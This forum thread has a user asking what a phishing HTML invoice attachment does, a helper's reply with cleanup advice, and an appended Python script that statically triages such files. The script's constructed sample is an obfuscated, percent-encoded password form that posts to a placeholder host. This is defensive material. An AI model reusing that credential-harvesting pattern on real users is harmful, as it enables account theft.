What is this malware designed to do? (html and javascript)



#1 Mharpes

Posted 14 April 2017 - 10:46 AM

See this link:

https://drive.google.com/file/d/0B21NBE_QlXx3TTlaaUJrMGpvdVE/view?usp=sharing

It was sent to my mother in an email as an html attachment last night. I have changed the file extension from .html to .txt so it shouldn't present any danger. I have no knowledge of html syntax so I don't really know what it is trying to do but it looks like when you click on it intending to open the 'OUTSTANDING INVOICE' it will instead spawn a mockup of the gmail login page to trick you into entering your gmail account credentials which presumably get forwarded on to whoever wrote the malware. She opened it originally on her Android phone so it downloaded the html file rather than opening it and anyway she doesn't have a gmail account so I would be inclined to think that no harm was done. This morning however our internet connection was down, which is very unusual, and I had to power-cycle the modem/router to get it back. This may be a coincidence but it makes me wonder if the malware did something more. She did say that when she clicked on it originally on her phone, a dialog popped up asking for access to her contacts, she thinks (not clear if it was her phone contacts or the contacts in her email account), which she granted. Now this may just have been to forward the malware on to all her (phone/email) contacts which again wouldn't concern me overly.

To see it in action you can simply rename it from .txt to .html and click on it but obviously if it does more than steal gmail credentials this would not be advised.

So, is there anyone who knows html and javascript and can tell me for sure what this file is designed to do and whether or not our home network could be compromised?

Thanks,

M.


#2 buddy215


Posted 15 April 2017 - 02:30 PM

Welcome to BC....

My guess is it was a criminal phishing email attempting to get a CC number or other financial info since it mentioned an outstanding invoice. Many different forms of this type of phishing.

I suggest resetting the phone to default....since access to email account and who knows what else was granted.

You should consider changing email address and cancel/terminate/delete the present email address.

A bit of advice...NEVER open an email unless you recognize the sender.

NEVER open an attachment unless you are 100% sure of what it contains.


“Every atom in your body came from a star that exploded and the atoms in your left hand probably came from a different star than your right hand. It really is the most poetic thing I know about physics...you are all stardust.” Lawrence M. Krauss
A 1792 U.S. penny, designed in part by Thomas Jefferson and George Washington, reads “Liberty Parent of Science & Industry.”
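
Added example, not part of either post and not derived from the attachment itself: a static check that addresses the "what is this file designed to do" question from the first post without renaming the file back to .html or opening it in a browser. The sample input is constructed, `phish.example` is a placeholder host, and the percent-encoded `document.write(unescape(...))` wrapper is an assumed obfuscation, since the attachment's contents are not shown in the thread.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Constructed sample (NOT the thread's attachment); phish.example and the unescape() wrapper are assumptions.
SAMPLE = ("<script>document.write(unescape('%3Cform%20action%3D%22http%3A//phish.example/c.php"
          "%22%3E%3Cinput%20type%3D%22password%22%20name%3D%22p%22%3E%3C/form%3E'));</script>")

OBFUSCATION = re.compile(r"\b(unescape|atob|eval|fromCharCode|document\.write)\b")
ENCODED = re.compile(r"""['"]([^'"]*%3[Cc][^'"]*)['"]""")  # string literal hiding an encoded "<"

class AttachmentTriage(HTMLParser):
    """Collects credential-harvesting indicators; nothing is rendered or executed."""
    def __init__(self):
        super().__init__()
        self.form_targets, self.password_fields = [], 0
        self.script_hits, self.hidden_layers, self._script = set(), [], None

    def handle_starttag(self, tag, attrs):
        a = {k: v or "" for k, v in attrs}
        if tag == "script":
            self._script = []          # start buffering the script body
        elif tag == "form":
            self.form_targets.append(a.get("action", ""))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.password_fields += 1

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            body, self._script = "".join(self._script), None
            self.script_hits.update(OBFUSCATION.findall(body))
            self.hidden_layers += [unquote(s) for s in ENCODED.findall(body)]

def triage(html_text):
    p, queue = AttachmentTriage(), [html_text]
    while queue:  # the file itself, then each markup layer decoded out of its scripts
        p.reset()
        p.feed(queue.pop())
        p.close()
        queue, p.hidden_layers = queue + p.hidden_layers, []
    hosts = sorted({urlparse(t).netloc.lower() for t in p.form_targets} - {""})
    return {"password_fields": p.password_fields, "form_post_hosts": hosts,
            "script_hits": sorted(p.script_hits),
            "sends_password_off_device": bool(p.password_fields and hosts)}

if __name__ == "__main__":
    print(triage(SAMPLE))
```

A result that lists `script_hits` but finds no password field is not a clean verdict: it means the page builds its markup at runtime in a way this decoder does not unwrap.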



